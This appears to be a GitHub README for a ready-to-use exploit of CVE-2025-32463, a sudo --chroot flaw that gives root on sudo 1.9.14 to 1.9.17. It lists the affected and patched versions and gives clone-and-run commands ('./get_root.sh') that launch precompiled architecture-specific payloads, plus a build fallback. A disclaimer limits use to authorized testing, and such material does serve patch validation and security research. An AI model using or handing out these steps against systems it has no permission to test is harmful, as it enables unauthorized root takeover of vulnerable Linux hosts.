CVE-2025-32463 - No gcc required

Privilege escalation to root via sudo, with NO NEED for gcc to be installed on the target.

Discovered by Rich Mirch.

I have written an article explaining the attack mitigation here: Ubuntu Unattended-Upgrades

Affected Versions

• Vulnerable: sudo 1.9.14, 1.9.15, 1.9.16, 1.9.17
• Patched in: sudo 1.9.17p1 and later
• Legacy versions older than 1.9.14 are not affected, as they don't support the --chroot option.

---

Exploit (gcc is NOT required)

# get_root.sh and get_root.py do the same thing.
git clone https://github.com/MohamedKarrab/CVE-2025-32463.git
cd CVE-2025-32463
./get_root.sh

No gcc is required on the target machine. The PoC works by checking the current architecture (e.g., x86_64, aarch64), then executing the corresponding dynamically pre-compiled payload. If that fails, it defaults to the static one.

If the exploit fails on your machine, you can still compile it using:

./mkall-dynamic.sh

# then run
./get_root.sh

But you will obviously need a compiler at this point.

---

Disclaimer

• This code is for educational and testing purposes only.
• Use only on systems you own or have explicit permission to test.
• I am not responsible for misuse or damages.

References

• NVD - CVE-2025-32463
• Stratascale - CVE-2025-32463 sudo chroot